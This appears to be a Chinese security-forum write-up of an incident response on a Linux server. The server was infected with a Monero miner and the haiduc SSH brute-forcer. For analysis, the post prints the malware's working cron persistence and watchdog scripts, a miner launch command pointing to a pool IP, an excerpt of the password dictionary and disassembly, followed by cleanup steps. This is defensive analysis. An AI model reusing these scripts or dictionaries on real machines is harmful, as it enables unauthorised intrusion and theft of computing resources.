【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)

  • A+
所属分类:逆向工程

作者坛账号:gxkyrftx


0 前言

上一篇文章火了是我没想到的,感谢大家的鼓励,原来不少人都深受这个东西的困扰,近一个星期也在琢磨写点什么好,恰好蜜罐又报警了,于是题材来了。这个机器不是实验室的集群,但是经过一些方法(方法不能说-_-)知道了该机器的ssh用户名和口令。

1 网络连接

我的习惯一般是先看网络连接,使用netstat。上篇文章说了,黑客可能会进行bash替换,但是在这台机器上没有发现替换的痕迹,这是提前检查过的,所以系统自带的bash可以放心使用。

可以看到下面的图片里,本机开了n多个大端口,连接了很多主机的22,有一个的状态是已经建立连接,进程是sshd,另外都是等待状态。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


这其实就是在同时对多个主机进行暴力破解,如果破解成功就是established状态,time_wait是还未破解成功,正在使用其他的用户名-密码对尝试。

随后使用ss再看一下

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


同样是本机对其他机器的ssh爆破,只不过这次看到了一个haiduc进程,我们使用grep,过滤出haiduc建立的连接,如下图所示

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


由此我们可以确定,haiduc应该是个恶意文件。(其实看到这,估计已经有大佬知道是什么情况了,因为haiduc这个工具还是蛮出名的,只不过我几个月前刚开始弄得时候啥也不知道,哈哈哈哈)

接下来我们随机挑选一位幸运进程,在/proc/幸运进程id,查看它的详细情况

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


然后我们就找到了haiduc的目录。文件夹的内容如下

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


2 进程列表

使用ps查看所有进程

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


可以看到很多sshd发起的进程,这些命令就是用字典p爆破scan.log里的每一条ip,具体的文件内容看文件分析一节。

3 screen列表

查了history记录没有,w也只看到我一个人,last也没有,于是就去看了一下screen列表,果然找到了一个screen。相关命令如下

screen -ls 查看有多少screen

screen -r screenid 连接某个screen

连接上去之后就是这个样子,不断的在尝试用户名-密码对。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


我们选择ctrl+c停了它,然后查看history记录

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


记录显示,黑客步骤如下:

 复制代码 隐藏代码
1.使用masscan对5个A段地址进行扫描,然后将存活主机写入ips,随后在ips中提取ip,写入bios.txt
2.使用bannerbios.txt中的ip进行banner识别,将识别结果写入banner.log,然后在banner.log中提取bannerSSH-2.0-OpenSSHip,写入ips.lst,然后将其命名为scan.log
3.使用haiducscan.log中的ip进行爆破,字典文件为p,把爆破结果写入到gasite.txt中。
4.查看爆破得到的结果,然后横向移动到某台机器上

4 cpu利用率

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


我们可以看到,飙到了1486%,是一个叫-bash的进程引起的,查看发起这个进程的文件位置,发现被删了,目录为/usr/bin/-bash。

5 定时任务

使用crontab可以查看当前定时任务

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


这里我们可以看到出现了一个新的目录,/tmp/.cache,我们可以看一下这个目录的内容

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


这里的bash和上面的cpu利用率最高的-bash有点像,但是并不是同一个病毒。这里暂时不提其他的病毒了(其实这台机器中了三种不同的病毒-_-),提其他的容易乱套,就谈这次的这些。

这个文件夹下的内容是挖矿文件,在第6节中分析。

6 端口扫描文件分析

就是前面我们提到了黑客扫描工具haiduc的文件目录,也提到了一些工具的使用方法,在此简单对这些文件做一个分析。其中scan.log,banner.log,bios.txt,ips,因为全是ip或者ip+banner,没啥意思,不写了。masscan这个软件太有名了,大家也都知道,不写了。

6.1 gasite.txt

gasite.txt是最后爆破的结果,第一列是用户名,打码的第一列是密码,打码的第二列是ip,后面的端口以及状态。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


6.2 p

p文件是字典,这些部分内容如下。

 复制代码 隐藏代码
root welc0me
root welcome
root Welcome
root welcome1
root [email protected]1
root Welcome1
root welcome123
root [email protected]123
root Welcome123
root [email protected]123

顺便提一句,这个字典现在已经很强大了,收集了整个内网很多用户名和密码,而且黑客还自己做了一些组合,使用用户名+短口令(例如123,666,2021等)的组合,真让人看的头皮发麻。。。

6.3 haiduc

这是一个爆破软件,使用密码字典爆破已知的ip,可以加的参数有:线程数,模式数,密码文件,端口,执行的bash命令
下面是主函数中关于参数的部分

 复制代码 隐藏代码
if ( !strcmp(argv[2], "-b") )
  {
    atoi(argv[4], "-b");
    v3 = argv[6];
    scanbclass((__int64)*argv, (__int64)argv[1], (__int64)argv[3], (__int64)argv[4], (__int64)argv[5]);
    decrypt_0((__int64)"                                                 [+]n", (__int64)&v5, &v8);
    printf('Xx1F�', &v8);
    scan(*argv, argv[1], "scan.log", argv[4], argv[5], argv[6]);
  }
  if ( !strcmp(argv[2], "-r") )
  {
    atoi(argv[4], "-r");
    genrand((__int64)*argv, (__int64)argv[1], (__int64)argv[3], (__int64)argv[4], (__int64)argv[5]);
  }
  result = strcmp(argv[2], "-f");
  if ( !result )
    result = scan(*argv, argv[1], argv[3], argv[4], argv[5], argv[6]);
  return result;
}

根据配置的参数,调用scan函数进行扫描。scan函数也简单看一下
下面这一部分是调用/usr/sbin/sshd程序

 复制代码 隐藏代码
.text:0000000000403206 loc_403206:                             ; CODE XREF: scandindiv:loc_40313D↑j
.text:0000000000403206                 mov     rdx, [rbp+var_9DA58]
.text:000000000040320D                 lea     rax, [rbp+var_1020]
.text:0000000000403214                 mov     esi, 7E8h
.text:0000000000403219                 mov     rdi, rax
.text:000000000040321C                 call    fgets
.text:0000000000403221                 test    rax, rax
.text:0000000000403224                 jnz     loc_403142
.text:000000000040322A                 mov     rax, [rbp+var_9DA58]
.text:0000000000403231                 mov     rdi, rax
.text:0000000000403234                 call    fclose
.text:0000000000403239                 mov     rax, [rbp+var_9DA80]
.text:0000000000403240                 mov     rdi, rax
.text:0000000000403243                 call    atoi
.text:0000000000403248                 mov     cs:maxf, eax
.text:000000000040324E                 mov     rax, [rbp+var_9DA78]
.text:0000000000403255                 mov     rbx, 'ibs/rsu/'
.text:000000000040325F                 mov     [rax], rbx
.text:0000000000403262                 mov     dword ptr [rax+8], 'ss/n'
.text:0000000000403269                 mov     word ptr [rax+0Ch], 'dh'
.text:000000000040326F                 mov     byte ptr [rax+0Eh], 0
.text:0000000000403273                 mov     [rbp+var_9DA6C], 0
.text:000000000040327D                 jmp     loc_40336E

再往下面,是读取密码文件

 复制代码 隐藏代码
.text:0000000000402EF4 loc_402EF4:                             ; CODE XREF: scan+467↓j
.text:0000000000402EF4                 mov     eax, [rbp+var_13B4A4]
.text:0000000000402EFA                 add     eax, 1
.text:0000000000402EFD                 cdqe
.text:0000000000402EFF                 mov     rdx, [rbp+rax*8+var_9EA40]
.text:0000000000402F07                 mov     eax, [rbp+var_13B4A4]
.text:0000000000402F0D                 cdqe
.text:0000000000402F0F                 mov     rax, [rbp+rax*8+var_9EA40]
.text:0000000000402F17                 mov     rsi, rax
.text:0000000000402F1A                 mov     edi, offset aIncercSS ; "[+] Incerc: %s:%s              n"
.text:0000000000402F1F                 mov     eax, 0
.text:0000000000402F24                 call    printf
.text:0000000000402F29                 mov     [rbp+var_13B4A0], 0
.text:0000000000402F33                 jmp     loc_40302D

接下来关键部分是验证是否登录成功,在checkauth函数里使用了libssh2库进行验证。

 复制代码 隐藏代码
.text:0000000000402F74 loc_402F74:                             ; CODE XREF: scan+35F↑j
.text:0000000000402F74                 cmp     [rbp+var_13B498], 0
.text:0000000000402F7B                 jnz     short loc_402FD3
.text:0000000000402F7D                 mov     eax, [rbp+var_13B4A0]
.text:0000000000402F83                 cdqe
.text:0000000000402F85                 mov     rdx, [rbp+rax*8+var_13B460]
.text:0000000000402F8D                 mov     eax, [rbp+var_13B4A4]
.text:0000000000402F93                 add     eax, 1
.text:0000000000402F96                 cdqe
.text:0000000000402F98                 mov     rsi, [rbp+rax*8+var_9EA40]
.text:0000000000402FA0                 mov     eax, [rbp+var_13B4A4]
.text:0000000000402FA6                 cdqe
.text:0000000000402FA8                 mov     rax, [rbp+rax*8+var_9EA40]
.text:0000000000402FB0                 mov     rdi, [rbp+var_13B4E0]
.text:0000000000402FB7                 mov     rcx, [rbp+var_13B4D8]
.text:0000000000402FBE                 mov     r8, rdi
.text:0000000000402FC1                 mov     rdi, rax
.text:0000000000402FC4                 call    checkauth
.text:0000000000402FC9                 mov     edi, 0
.text:0000000000402FCE                 call    exit

5.4 banner

banner有三个参数,ip文件,端口号,线程数,分析了一下,太复杂了(我太菜了),不停的在跳转,也没啥有用的信息,选择放弃。不过尝试着用了一下,能识别的端口挺多的。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


7 挖矿文件分析

前面我们提到了bash文件夹是挖矿文件,来看一下他们,经过总体分析,我整理出了执行顺序,下面按顺序分析。

7.1 x 文件

 复制代码 隐藏代码
nohup ./a >>/dev/null &

不输出结果的方式,在后台运行a。

7.2 a文件

 复制代码 隐藏代码
pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/upd >/dev/null 2>&1" > cron.d
echo "home.php?mod=space&uid=600677 $dir/upd >/dev/null 2>&1" >> cron.d
crontab cron.d
crontab -l | grep upd
echo "#!/bin/sh
if test -r $dir/bash.pid; then
pid=$(cat $dir/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
sleep 1
else
cd $dir
./run &>/dev/null
exit 0
fi
fi" >upd
chmod u+x upd
./run &>/dev/null
 复制代码 隐藏代码
    1.将当前目录写入dir.dir
    2.将upd文件写入定时任务,定时任务文件为cron.d,然后运行定时任务。
    3.将shell脚本写入upd,然后运行
     4.随后运行run脚本

7.2.1 dir.dir

 复制代码 隐藏代码
/tmp/.cache

6.2.2 cron.d

 复制代码 隐藏代码
* * * * * /tmp/.cache/upd >/dev/null 2>&1
@reboot /tmp/.cache/upd >/dev/null 2>&1

7.2.3 upd

 复制代码 隐藏代码
#!/bin/sh
if test -r /tmp/.cache/bash.pid; then
pid=$(cat /tmp/.cache/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
sleep 1
else
cd /tmp/.cache
./run &>/dev/null
exit 0
fi
fi

这个脚本在检测挖矿程序是否在运行

7.3 run文件

 复制代码 隐藏代码
#!/bin/bash
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="xmrig"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./stak3/ld-linux.so.2 --library-path stak3 stak3/xmrig -o 159.203.14.2:443 -a cn/r -k >>/dev/null &
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig -o 159.203.14.2:443 -k >>/dev/null &
fi
echo $! > bash.pid
  1. 根据平台架构选择软件,h32和h64是用于隐藏程序名的文件,根据HIDE的名称,改变挖矿软件的进程名。

  2. ld-linux-x86-64.so.2,xmrig都是挖矿软件,xmrig可以在github上找到的,这里就不分析了。

  3. 159.203.14.2是矿池服务器

  4. 最后将进程id写入bash.pid,结合上面的定时任务,upd脚本,如果只杀进程,根本处理不了。

8 第一次清理病毒的结果

对这个病毒,其实还是常规的方法,删文件,杀进程,清理定时任务。

这次需要杀的进程有点多,还有很多sshd扫描的,所以我选择根据进程名称批量删除,这里分享我的一个命令。

ps -ef | grep "scan.log p 22 nproc;"|cut -c 9-15|grep -v grep|xargs kill -s 9

ps显示所有进程信息,然后过滤出含有特定字符串的,然后找到进程后,剔除掉grep自身的进程号,然后使用将过滤出的进程号作为参数,kill掉所有进程

一般来说结束了,但是对于这台服务器并没有结束。进程重启了。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


我们看一下这个进程的详细信息,发现文件被删除了。因此需要查其他方面的信息。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


9 /etc/cron*排查

经过很长时间的排查,发现这个-bash总是会每一个小时重启一次,我们想到了cron.hourly这个目录,于是直接看一下这个目录的内容

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


看一下sync

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


病毒无疑了,也可以上威胁情报查一下,复制bin目录下的一个文件,然后改名,运行,最后删除自己,只留一个进程。而且后续发现,每个cron.* 目录(也就是cron.daily等目录)都有这个脚本的存在。

10 第二次清理病毒的结果

首先去bin目录删除sysdrr,发现无法删除,因为文件属性加了i,可以根据图中的命令删除。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


同样的,删除sync定时任务的时候也需要用chattr -i先修改文件属性,然后再删除。至此,我们的服务器暂时安全。

11 总结

这次的几个病毒针对的是只有cpu的机器,挖的是xmr也就是门罗币,随着比特币的不断升值,各类数字货币的价格也一起升天,各类黑产也更加频繁,如何保护好自己的计算资源成为了一个大问题。在这次的清理中,还碰到了黑客也在登录的情况,我选择直接踢了他。

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)


总结如下:

  1. 这台服务器被攻陷的原因还是因为ssh弱口令,弱口令是第一道门。

  2. 定时任务也需要定时看一看。

  3. 上一篇有朋友不知道威胁情报,国内比较好用的是微步在线,国外的我常用的是virustotal

  4. 近几个月来,校园网内网中的挖矿病毒50%都可以用两篇文章中的方法清除。因此可以考虑写个脚本(todo)。


--

www.52pojie.cn


--

pojie_52

本文始发于微信公众号(吾爱破解论坛):【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: